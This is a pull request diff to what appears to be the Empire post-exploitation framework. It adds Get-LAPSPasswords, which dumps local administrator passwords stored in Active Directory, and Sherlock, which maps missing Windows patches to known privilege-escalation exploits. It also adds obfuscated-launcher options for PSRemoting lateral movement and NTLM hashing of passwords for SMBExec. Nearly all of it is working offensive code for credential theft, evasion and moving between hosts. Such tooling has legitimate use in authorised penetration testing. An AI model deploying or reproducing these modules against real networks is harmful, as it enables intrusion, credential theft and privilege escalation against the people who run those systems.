### PR TITLE
Fixes to PSRemoting and adding Get-LAPSPasswords Module

### DIFF
--- a/data/agent/stagers/http.ps1
+++ b/data/agent/stagers/http.ps1
@@ -167,7 +167,9 @@ function Start-Negotiate {
     if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
     $i+="|$ip";
 
-    $i+='|'+(Get-WmiObject Win32_OperatingSystem).Name.split('|')[0];
+    $os = (Get-WmiObject Win32_OperatingSystem).Name.split('|')[0];
+    if(!$os -or $os.trim() -eq '') {$os='Windows ?'};
+    $i+="|$os";
 
     # detect if we're SYSTEM or otherwise high-integrity
     if(([Environment]::UserName).ToLower() -eq "system"){$i+="|True"}

--- a/data/module_source/credentials/Get-LAPSPasswords.ps1
+++ b/data/module_source/credentials/Get-LAPSPasswords.ps1
@@ -1,0 +1,147 @@
+function Get-LAPSPasswords
+{
+    <#
+        .Synopsis
+           This module will query Active Directory for the hostname, LAPS (local administrator) stored password, 
+		   and password expiration for each computer account.
+        .DESCRIPTION
+           This module will query Active Directory for the hostname, LAPS (local administrator) stored password, 
+		   and password expiration for each computer account. The script filters out disabled domain computers. 
+		   LAPS password storage can be identified by querying the (domain user available) ms-MCS-AdmPwdExpirationTime 
+		   attribute. If the attribute (timestamp) exists, LAPS is in use for local administrator passwords. Access to
+		   ms-MCS-AdmPwd attribute should be restricted to privileged accounts.  Also, since the script uses data tables 
+		   to output affected systems the results can be easily piped to other commands such as test-connection or a Export-Csv.
+        .EXAMPLE
+           The example below shows the standard command usage. Disabled system are excluded by default. If your user doesn't
+		   have the rights to read the password, then it will show 0 for Readable.
+		   PS C:\> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential demo.com\administrator | Format-Table -AutoSize
+           
+           Hostname                    Stored Readable Password       Expiration         
+		   --------                    ------ -------- --------       ----------         
+		   WIN-M8V16OTGIIN.test.domain 0      0                       NA                 
+		   WIN-M8V16OTGIIN.test.domain 0      0                       NA                 
+		   ASSESS-WIN7-TES.test.domain 1      1        $sl+xbZz2&qtDr 6/3/2015 7:09:28 PM                  
+        .EXAMPLE
+           The example below shows how to write the output to a csv file.
+           PS C:\> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential demo.com\administrator | Export-Csv c:\temp\output.csv -NoTypeInformation
+        .LINK
+           https://blog.netspi.com/running-laps-around-cleartext-passwords/
+           https://github.com/kfosaaen/Get-LAPSPasswords
+		   https://technet.microsoft.com/en-us/library/security/3062591
+           
+        .NOTES
+           Author: Karl Fosaaen - 2015, NetSPI
+           Version: Get-LAPSPasswords.psm1 v1.0
+           Comments: The technique used to query LDAP was based on the "Get-AuditDSComputerAccount" 
+           function found in Carlos Perez's PoshSec-Mod project.  The general idea is based off of  
+           a Twitter conversation with @_wald0. The bones of this were borrowed (with permission) from 
+		   Scott Sutherland's Get-ExploitableSystems function.
+    
+    #>
+    [CmdletBinding()]
+    Param(
+        [Parameter(Mandatory=$false,
+        HelpMessage="Credentials to use when connecting to a Domain Controller.")]
+        [System.Management.Automation.PSCredential]
+        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,
+        
+        [Parameter(Mandatory=$false,
+        HelpMessage="Domain controller for Domain and Site that you want to query against.")]
+        [string]$DomainController,
+
+        [Parameter(Mandatory=$false,
+        HelpMessage="Maximum number of Objects to pull from AD, limit is 1,000.")]
+        [int]$Limit = 1000,
+
+        [Parameter(Mandatory=$false,
+        HelpMessage="scope of a search as either a base, one-level, or subtree search, default is subtree.")]
+        [ValidateSet("Subtree","OneLevel","Base")]
+        [string]$SearchScope = "Subtree",
+
+        [Parameter(Mandatory=$false,
+        HelpMessage="Distinguished Name Path to limit search to.")]
+
+        [string]$SearchDN
+    )
+    Begin
+    {
+        if ($DomainController -and $Credential.GetNetworkCredential().Password)
+        {
+            $objDomain = New-Object System.DirectoryServices.DirectoryEntry "LDAP://$($DomainController)", $Credential.UserName,$Credential.GetNetworkCredential().Password
+            $objSearcher = New-Object System.DirectoryServices.DirectorySearcher $objDomain
+        }
+        else
+        {
+            $objDomain = [ADSI]""  
+            $objSearcher = New-Object System.DirectoryServices.DirectorySearcher $objDomain
+        }
+    }
+
+    Process
+    {
+        # Status user
+        Write-Verbose "[*] Grabbing computer accounts from Active Directory..."
+
+        # Create data table for hostnames, and passwords from LDAP
+        $TableAdsComputers = New-Object System.Data.DataTable 
+        $TableAdsComputers.Columns.Add('Hostname') | Out-Null
+        $TableAdsComputers.Columns.Add('Stored') | Out-Null
+        $TableAdsComputers.Columns.Add('Readable') | Out-Null
+        $TableAdsComputers.Columns.Add('Password') | Out-Null
+        $TableAdsComputers.Columns.Add('Expiration') | Out-Null
+
+        # ----------------------------------------------------------------
+        # Grab computer account information from Active Directory via LDAP
+        # ----------------------------------------------------------------
+        $CompFilter = "(&(objectCategory=Computer))"
+        $ObjSearcher.PageSize = $Limit
+        $ObjSearcher.Filter = $CompFilter
+        $ObjSearcher.SearchScope = "Subtree"
+
+        if ($SearchDN)
+        {
+            $objSearcher.SearchDN = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$($SearchDN)")
+        }
+
+        $ObjSearcher.FindAll() | ForEach-Object {
+
+            # Setup fields
+            $CurrentHost = $($_.properties['dnshostname'])
+            $CurrentUac = $($_.properties['useraccountcontrol'])
+			$CurrentPassword = $($_.properties['ms-MCS-AdmPwd'])
+            if ($_.properties['ms-MCS-AdmPwdExpirationTime'] -ge 0){$CurrentExpiration = $([datetime]::FromFileTime([convert]::ToInt64($_.properties['ms-MCS-AdmPwdExpirationTime'],10)))}
+            else{$CurrentExpiration = "NA"}
+                        
+            $PasswordAvailable = 0
+            $PasswordStored = 1
+
+            # Convert useraccountcontrol to binary so flags can be checked
+            # http://support.microsoft.com/en-us/kb/305144
+            # http://blogs.technet.com/b/askpfeplat/archive/2014/01/15/understanding-the-useraccountcontrol-attribute-in-active-directory.aspx
+            $CurrentUacBin = [convert]::ToString($CurrentUac,2)
+
+            # Check the 2nd to last value to determine if its disabled
+            $DisableOffset = $CurrentUacBin.Length - 2
+            $CurrentDisabled = $CurrentUacBin.Substring($DisableOffset,1)
+
+            # Set flag if stored password is not available
+            if ($CurrentExpiration -eq "NA"){$PasswordStored = 0}
+
+
+            if ($CurrentPassword.length -ge 1){$PasswordAvailable = 1}
+
+
+            # Add computer to list if it's enabled
+            if ($CurrentDisabled  -eq 0){
+                # Add domain computer to data table
+                $TableAdsComputers.Rows.Add($CurrentHost,$PasswordStored,$PasswordAvailable,$CurrentPassword, $CurrentExpiration) | Out-Null
+            }
+
+            # Display results
+            $TableAdsComputers | Sort-Object {$_.Hostname} -Descending
+         }
+    }
+    End
+    {
+    }
+}

--- a/data/module_source/credentials/Get-LAPSPasswords.ps1
+++ b/data/module_source/credentials/Get-LAPSPasswords.ps1
@@ -136,10 +136,9 @@ function Get-LAPSPasswords
                 # Add domain computer to data table
                 $TableAdsComputers.Rows.Add($CurrentHost,$PasswordStored,$PasswordAvailable,$CurrentPassword, $CurrentExpiration) | Out-Null
             }
-
-            # Display results
-            $TableAdsComputers | Sort-Object {$_.Hostname} -Descending
          }
+        # Display results
+        $TableAdsComputers | Sort-Object {$_.Hostname} -Descending
     }
     End
     {

--- a/data/module_source/privesc/Sherlock.ps1
+++ b/data/module_source/privesc/Sherlock.ps1
@@ -1,0 +1,491 @@
+﻿<#
+
+    File: Sherlock.ps1
+    Author: @_RastaMouse
+    License: GNU General Public License v3.0
+
+#>
+
+$Global:ExploitTable = $null
+
+function Get-FileVersionInfo ($FilePath) {
+
+    $VersionInfo = (Get-Item $FilePath).VersionInfo
+    $FileVersion = ( "{0}.{1}.{2}.{3}" -f $VersionInfo.FileMajorPart, $VersionInfo.FileMinorPart, $VersionInfo.FileBuildPart, $VersionInfo.FilePrivatePart )
+        
+    return $FileVersion
+
+}
+
+function Get-InstalledSoftware($SoftwareName) {
+
+    $SoftwareVersion = Get-WmiObject -Class Win32_Product | Where { $_.Name -eq $SoftwareName } | Select-Object Version
+    $SoftwareVersion = $SoftwareVersion.Version  # I have no idea what I'm doing
+    
+    return $SoftwareVersion
+
+}
+
+function Get-Architecture {
+
+    # This is the CPU architecture.  Returns "64-bit" or "32-bit".
+    $CPUArchitecture = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
+
+    # This is the process architecture, e.g. are we an x86 process running on a 64-bit system.  Retuns "AMD64" or "x86".
+    $ProcessArchitecture = $env:PROCESSOR_ARCHITECTURE
+
+    return $CPUArchitecture, $ProcessArchitecture
+
+}
+
+function New-ExploitTable {
+
+    # Create the table
+    $Global:ExploitTable = New-Object System.Data.DataTable
+
+    # Create the columns
+    $Global:ExploitTable.Columns.Add("Title")
+    $Global:ExploitTable.Columns.Add("MSBulletin")
+    $Global:ExploitTable.Columns.Add("CVEID")
+    $Global:ExploitTable.Columns.Add("Link")
+    $Global:ExploitTable.Columns.Add("VulnStatus")
+
+    # Add the exploits we are interested in.
+
+    # MS10
+    $Global:ExploitTable.Rows.Add("User Mode to Ring (KiTrap0D)","MS10-015","2010-0232","https://www.exploit-db.com/exploits/11199/")
+    $Global:ExploitTable.Rows.Add("Task Scheduler .XML","MS10-092","2010-3338, 2010-3888","https://www.exploit-db.com/exploits/19930/")
+    # MS13
+    $Global:ExploitTable.Rows.Add("NTUserMessageCall Win32k Kernel Pool Overflow","MS13-053","2013-1300","https://www.exploit-db.com/exploits/33213/")
+    $Global:ExploitTable.Rows.Add("TrackPopupMenuEx Win32k NULL Page","MS13-081","2013-3881","https://www.exploit-db.com/exploits/31576/")
+    # MS14
+    $Global:ExploitTable.Rows.Add("TrackPopupMenu Win32k Null Pointer Dereference","MS14-058","2014-4113","https://www.exploit-db.com/exploits/35101/")
+    # MS15
+    $Global:ExploitTable.Rows.Add("ClientCopyImage Win32k","MS15-051","2015-1701, 2015-2433","https://www.exploit-db.com/exploits/37367/")
+    $Global:ExploitTable.Rows.Add("Font Driver Buffer Overflow","MS15-078","2015-2426, 2015-2433","https://www.exploit-db.com/exploits/38222/")
+    # MS16
+    $Global:ExploitTable.Rows.Add("'mrxdav.sys' WebDAV","MS16-016","2016-0051","https://www.exploit-db.com/exploits/40085/")
+    $Global:ExploitTable.Rows.Add("Secondary Logon Handle","MS16-032","2016-0099","https://www.exploit-db.com/exploits/39719/")
+    $Global:ExploitTable.Rows.Add("Win32k Elevation of Privilege","MS16-135","2016-7255","https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135")
+    # Miscs that aren't MS
+    $Global:ExploitTable.Rows.Add("Nessus Agent 6.6.2 - 6.10.3","N/A","2017-7199","https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html")
+
+}
+
+function Set-ExploitTable ($MSBulletin, $VulnStatus) {
+
+    if ( $MSBulletin -like "MS*" ) {
+
+        $Global:ExploitTable | Where { $_.MSBulletin -eq $MSBulletin
+
+        } | ForEach-Object {
+
+            $_.VulnStatus = $VulnStatus
+
+        }
+
+    } else {
+
+
+    $Global:ExploitTable | Where { $_.CVEID -eq $MSBulletin
+
+        } | ForEach-Object {
+
+            $_.VulnStatus = $VulnStatus
+
+        }
+
+    }
+
+}
+
+function Get-Results {
+
+    $Global:ExploitTable
+
+}
+
+function Find-AllVulns {
+
+    if ( !$Global:ExploitTable ) {
+
+        $null = New-ExploitTable
+    
+    }
+
+        Find-MS10015
+        Find-MS10092
+        Find-MS13053
+        Find-MS13081
+        Find-MS14058
+        Find-MS15051
+        Find-MS15078
+        Find-MS16016
+        Find-MS16032
+        Find-MS16135
+        Find-CVE20177199
+
+        Get-Results
+
+}
+
+function Find-MS10015 {
+
+    $MSBulletin = "MS10-015"
+    $Architecture = Get-Architecture
+
+    if ( $Architecture[0] -eq "64-bit" ) {
+
+        $VulnStatus = "Not supported on 64-bit systems"
+
+    } Else {
+
+        $Path = $env:windir + "\system32\ntoskrnl.exe"
+        $VersionInfo = Get-FileVersionInfo($Path)
+        $VersionInfo = $VersionInfo.Split(".")
+
+        $Build = $VersionInfo[2]
+        $Revision = $VersionInfo[3].Split(" ")[0]
+
+        switch ( $Build ) {
+
+            7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20591" ] }
+            default { $VulnStatus = "Not Vulnerable" }
+
+        }
+
+    }
+
+    Set-ExploitTable $MSBulletin $VulnStatus
+
+}
+
+function Find-MS10092 {
+
+    $MSBulletin = "MS10-092"
+    $Architecture = Get-Architecture
+
+    if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
+
+        $Path = $env:windir + "\system32\schedsvc.dll"
+
+    } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
+
+        $Path = $env:windir + "\sysnative\schedsvc.dll"
+
+    }
+
+        $VersionInfo = Get-FileVersionInfo($Path)
+        $VersionInfo = $VersionInfo.Split(".")
+
+        $Build = $VersionInfo[2]
+        $Revision = $VersionInfo[3].Split(" ")[0]
+
+        switch ( $Build ) {
+
+            7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20830" ] }
+            default { $VulnStatus = "Not Vulnerable" }
+
+        }
+
+    Set-ExploitTable $MSBulletin $VulnStatus
+
+}
+
+function Find-MS13053 {
+
+    $MSBulletin = "MS13-053"
+    $Architecture = Get-Architecture
+
+    if ( $Architecture[0] -eq "64-bit" ) {
+
+        $VulnStatus = "Not supported on 64-bit systems"
+
+    } Else {
+
+        $Path = $env:windir + "\system32\win32k.sys"
+        $VersionInfo = Get-FileVersionInfo($Path)
+        $VersionInfo = $VersionInfo.Split(".")
+
+        $Build = $VersionInfo[2]
+        $Revision = $VersionInfo[3].Split(" ")[0]
+
+        switch ( $Build ) {
+
+            7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "17000" ] }
+            7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22348" ] }
+            9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20732" ] }
+            default { $VulnStatus = "Not Vulnerable" }
+
+        }
+
+    }
+
+    Set-ExploitTable $MSBulletin $VulnStatus
+
+}
+
+function Find-MS13081 {
+
+    $MSBulletin = "MS13-081"
+    $Architecture = Get-Architecture
+
+    if ( $Architecture[0] -eq "64-bit" ) {
+
+        $VulnStatus = "Not supported on 64-bit systems"
+
+    } Else {
+
+        $Path = $env:windir + "\system32\win32k.sys"
+        $VersionInfo = Get-FileVersionInfo($Path)
+        $VersionInfo = $VersionInfo.Split(".")
+
+        $Build = $VersionInfo[2]
+        $Revision = $VersionInfo[3].Split(" ")[0]
+
+        switch ( $Build ) {
+
+            7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "18000" ] }
+            7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22435" ] }
+            9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20807" ] }
+            default { $VulnStatus = "Not Vulnerable" }
+
+        }
+
+    }
+
+    Set-ExploitTable $MSBulletin $VulnStatus
+
+}
+
+function Find-MS14058 {
+
+    $MSBulletin = "MS14-058"
+    $Architecture = Get-Architecture
+
+    if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
+
+        $Path = $env:windir + "\system32\win32k.sys"
+
+    } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
+
+        $Path = $env:windir + "\sysnative\win32k.sys"
+
+    }
+
+        $VersionInfo = Get-FileVersionInfo($Path)
+        $VersionInfo = $VersionInfo.Split(".")
+
+        $Build = $VersionInfo[2]
+        $Revision = $VersionInfo[3].Split(" ")[0]
+
+        switch ( $Build ) {
+
+            7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "18000" ] }
+            7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22823" ] }
+            9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21247" ] }
+            9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "17353" ] }
+            default { $VulnStatus = "Not Vulnerable" }
+
+        }
+
+    Set-ExploitTable $MSBulletin $VulnStatus
+
+}
+
+function Find-MS15051 {
+
+    $MSBulletin = "MS15-051"
+    $Architecture = Get-Architecture
+
+    if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
+
+        $Path = $env:windir + "\system32\win32k.sys"
+
+    } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
+
+        $Path = $env:windir + "\sysnative\win32k.sys"
+
+    }
+
+        $VersionInfo = Get-FileVersionInfo($Path)
+        $VersionInfo = $VersionInfo.Split(".")
+
+        $Build = $VersionInfo[2]
+        $Revision = $VersionInfo[3].Split(" ")[0]
+
+        switch ( $Build ) {
+
+            7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "18000" ] }
+            7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22823" ] }
+            9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21247" ] }
+            9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "17353" ] }
+            default { $VulnStatus = "Not Vulnerable" }
+
+        }
+
+    Set-ExploitTable $MSBulletin $VulnStatus
+
+}
+
+function Find-MS15078 {
+
+    $MSBulletin = "MS15-078"
+
+    $Path = $env:windir + "\system32\atmfd.dll"
+    $VersionInfo = Get-FileVersionInfo($Path)
+    $VersionInfo = $VersionInfo.Split(" ")
+
+    $Revision = $VersionInfo[2]
+
+    switch ( $Revision ) {
+
+        243 { $VulnStatus = "Appears Vulnerable" }
+        default { $VulnStatus = "Not Vulnerable" }
+
+    }
+
+    Set-ExploitTable $MSBulletin $VulnStatus
+
+}
+
+function Find-MS16016 {
+
+    $MSBulletin = "MS16-016"
+    $Architecture = Get-Architecture
+
+    if ( $Architecture[0] -eq "64-bit" ) {
+
+        $VulnStatus = "Not supported on 64-bit systems"
+
+    } Else {
+
+        $Path = $env:windir + "\system32\drivers\mrxdav.sys"
+        $VersionInfo = Get-FileVersionInfo($Path)
+        $VersionInfo = $VersionInfo.Split(".")
+
+        $Build = $VersionInfo[2]
+        $Revision = $VersionInfo[3].Split(" ")[0]
+
+        switch ( $Build ) {
+
+            7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "16000" ] }
+            7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "23317" ] }
+            9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21738" ] }
+            9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "18189" ] }
+            10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "16683" ] }
+            10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "103" ] }
+            default { $VulnStatus = "Not Vulnerable" }
+
+        }
+
+    }
+
+    Set-ExploitTable $MSBulletin $VulnStatus
+
+}
+
+function Find-MS16032 {
+
+    $MSBulletin = "MS16-032"
+    $Architecture = Get-Architecture
+
+    if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
+
+        $Path = $env:windir + "\system32\seclogon.dll"
+
+    } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
+
+        $Path = $env:windir + "\sysnative\seclogon.dll"
+
+    } 
+
+        $VersionInfo = Get-FileVersionInfo($Path)
+
+        $VersionInfo = $VersionInfo.Split(".")
+
+        $Build = [int]$VersionInfo[2]
+        $Revision = [int]$VersionInfo[3].Split(" ")[0]
+
+        switch ( $Build ) {
+
+            6002 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 19598 -Or ( $Revision -ge 23000 -And $Revision -le 23909 ) ] }
+            7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 16000 ] }
+            7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 19148 -Or ( $Revision -ge 23000 -And $Revision -le 23347 ) ] }
+            9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 17649 -Or ( $Revision -ge 21000 -And $Revision -le 21767 ) ] }
+            9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 18230 ] }
+            10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 16724 ] }
+            10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 161 ] }
+            default { $VulnStatus = "Not Vulnerable" }
+
+        }
+
+    Set-ExploitTable $MSBulletin $VulnStatus
+
+}
+
+function Find-CVE20177199 {
+
+    $CVEID = "2017-7199"
+    $SoftwareVersion = Get-InstalledSoftware "Nessus Agent"
+    
+    if ( !$SoftwareVersion ) {
+
+        $VulnStatus = "Not Vulnerable"
+
+    } else {
+
+        $SoftwareVersion = $SoftwareVersion.Split(".")
+
+        $Major = [int]$SoftwareVersion[0]
+        $Minor = [int]$SoftwareVersion[1]
+        $Build = [int]$SoftwareVersion[2]
+
+        switch( $Major ) {
+
+        6 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Minor -eq 10 -and $Build -le 3 -Or ( $Minor -eq 6 -and $Build -le 2 ) -Or ( $Minor -le 9 -and $Minor -ge 7 ) ] } # 6.6.2 - 6.10.3
+        default { $VulnStatus = "Not Vulnerable" }
+
+        }
+
+    }
+
+    Set-ExploitTable $CVEID $VulnStatus
+
+}
+
+function Find-MS16135 {
+
+    $MSBulletin = "MS16-135"
+    $Architecture = Get-Architecture
+
+    if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
+
+        $Path = $env:windir + "\system32\win32k.sys"
+
+    } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
+
+        $Path = $env:windir + "\sysnative\win32k.sys"
+
+    }
+
+        $VersionInfo = Get-FileVersionInfo($Path)
+        $VersionInfo = $VersionInfo.Split(".")
+        
+        $Build = [int]$VersionInfo[2]
+        $Revision = [int]$VersionInfo[3].Split(" ")[0]
+
+        switch ( $Build ) {
+
+            7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 23584 ] }
+            9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 18524 ] }
+            10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 16384 ] }
+            10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 19 ] }
+            14393 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 446 ] }
+            default { $VulnStatus = "Not Vulnerable" }
+
+        }
+
+    Set-ExploitTable $MSBulletin $VulnStatus
+
+}

--- a/lib/common/helpers.py
+++ b/lib/common/helpers.py
@@ -56,6 +56,7 @@ from Crypto.Random import random
 import subprocess
 import fnmatch
 import urllib, urllib2
+import hashlib
 
 ###############################################################
 #

--- a/lib/modules/powershell/credentials/get_lapspasswords.py
+++ b/lib/modules/powershell/credentials/get_lapspasswords.py
@@ -1,0 +1,58 @@
+from lib.common import helpers
+class Module:
+    def __init__(self, mainMenu, params=[]):
+        self.info = {
+            'Name': 'Get-LAPSPasswords',
+            'Author': ['kfosaaen', 'n0decaf'],
+            'Description': "Dumps user readable LAPS passwords using kfosaaen's Get-LAPSPasswords.",
+            'Background' : True,
+            'OutputExtension' : None,
+            
+            'NeedsAdmin' : False,
+            'OpsecSafe' : True,
+            'Language' : 'powershell',
+            'MinLanguageVersion' : '2',
+            
+            'Comments': [
+                'https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1'
+            ]
+        }
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                'Description'   :   'Agent to run module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            }
+        }
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+        
+        for param in params:
+            # parameter format is [Name, Value]
+            option, value = param
+            if option in self.options:
+                self.options[option]['Value'] = value
+    def generate(self, obfuscate=False, obfuscationCommand=""):
+        
+        # read in the common module source code
+        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Get-LAPSPasswords.ps1"
+        if obfuscate:
+            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
+            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
+        try:
+            f = open(moduleSource, 'r')
+        except:
+            print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
+            return ""
+        moduleCode = f.read()
+        f.close()
+        script = moduleCode
+        scriptEnd = "Get-LAPSPasswords"
+        if obfuscate:
+            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+        script += scriptEnd
+        return script

--- a/lib/modules/powershell/lateral_movement/invoke_psremoting.py
+++ b/lib/modules/powershell/lateral_movement/invoke_psremoting.py
@@ -74,6 +74,26 @@ class Module:
                 'Description'   :   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                 'Required'      :   False,
                 'Value'         :   'default'
+            },
+            'Obfuscate' : {
+                'Description'   :   'Switch. Obfuscate the local powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
+                'Required'      :   False,
+                'Value'         :   False
+            },
+            'ObfuscationCommand' : {
+                'Description'   :   'The Invoke-Obfuscation command to use for obfuscation. Only used if Obfuscate switch is True. For powershell only.',
+                'Required'      :   False,
+                'Value'         :   'Token\All\\1,Launcher\STDIN++\\12467'
+            },
+            'LauncherObfuscate' : {
+                'Description'   :   'Switch. Obfuscate the launcher powershell code, uses the LauncherObfuscateCommand for obfuscation types. For powershell only.',
+                'Required'      :   False,
+                'Value'         :   False
+            },
+            'LauncherObfuscationCommand' : {
+                'Description'   :   'The Invoke-Obfuscation command to use for launcher obfuscation. Only used if LauncherObfuscate switch is True. For powershell only.',
+                'Required'      :   False,
+                'Value'         :   'Token\All\\1,Launcher\STDIN++\\12467'
             }
         }
 
@@ -94,8 +114,10 @@ class Module:
         userAgent = self.options['UserAgent']['Value']
         proxy = self.options['Proxy']['Value']
         proxyCreds = self.options['ProxyCreds']['Value']
-        userName = self.options['UserName']['Value']
-        password = self.options['Password']['Value']
+        obfuscate = self.options['Obfuscate']['Value']
+        obfuscationCommand = self.options['ObfuscationCommand']['Value']
+        launcherObfuscate = self.options['LauncherObfuscate']['Value']
+        launcherObfuscationCommand = self.options['LauncherObfuscationCommand']['Value']
 
         script = """Invoke-Command -AsJob """
 
@@ -112,6 +134,8 @@ class Module:
             self.options["UserName"]['Value'] = str(domainName) + "\\" + str(userName)
             self.options["Password"]['Value'] = password
 
+        userName = self.options['UserName']['Value']
+        password = self.options['Password']['Value']
 
         if not self.mainMenu.listeners.is_listener_valid(listenerName):
             # not a valid listener, return nothing for the script
@@ -120,7 +144,7 @@ class Module:
 
         else:
             # generate the PowerShell one-liner with all of the proper options set
-            launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
+            launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, obfuscate=launcherObfuscate, obfuscationCommand=launcherObfuscationCommand)
                 
             if launcher == "":
                 return ""

--- a/lib/modules/powershell/lateral_movement/invoke_psremoting.py
+++ b/lib/modules/powershell/lateral_movement/invoke_psremoting.py
@@ -97,7 +97,7 @@ class Module:
         userName = self.options['UserName']['Value']
         password = self.options['Password']['Value']
 
-        script = """Invoke-Command """
+        script = """Invoke-Command -AsJob """
 
         # if a credential ID is specified, try to parse
         credID = self.options["CredID"]['Value']

--- a/lib/modules/powershell/lateral_movement/invoke_smbexec.py
+++ b/lib/modules/powershell/lateral_movement/invoke_smbexec.py
@@ -53,11 +53,16 @@ class Module:
             'Domain' : {
                 'Description'   :   'Domain.',
                 'Required'      :   False,
+                'Value'         :   '.'
+            },
+            'Password' : {
+                'Description'   :   'Password for the specified username.',
+                'Required'      :   False,
                 'Value'         :   ''
             },
             'Hash' : {
                 'Description'   :   'NTLM Hash in LM:NTLM or NTLM format.',
-                'Required'      :   True,
+                'Required'      :   False,
                 'Value'         :   ''
             },
             'Service' : {
@@ -99,16 +104,20 @@ class Module:
 
 
     def generate(self, obfuscate=False, obfuscationCommand=""):
-        
+
         listenerName = self.options['Listener']['Value']
         computerName = self.options['ComputerName']['Value']
         userName = self.options['Username']['Value']
+        Password = self.options['Password']['Value']
         NTLMhash = self.options['Hash']['Value']
         domain = self.options['Domain']['Value']
         service = self.options['Service']['Value']
         userAgent = self.options['UserAgent']['Value']
         proxy = self.options['Proxy']['Value']
         proxyCreds = self.options['ProxyCreds']['Value']
+
+        if Password != '':
+            NTLMhash = helpers.binascii.hexlify(helpers.hashlib.new('md4', Password.encode('utf-16le')).digest())
 
         moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-SMBExec.ps1"
         if obfuscate:

--- a/lib/modules/powershell/management/invoke_script.py
+++ b/lib/modules/powershell/management/invoke_script.py
@@ -42,7 +42,7 @@ class Module:
             },
             'ScriptCmd' : {
                 'Description'   :   'Script command (Invoke-X) from file to run, along with any specified arguments.',
-                'Required'      :   True,
+                'Required'      :   False,
                 'Value'         :   ''
             }
         }

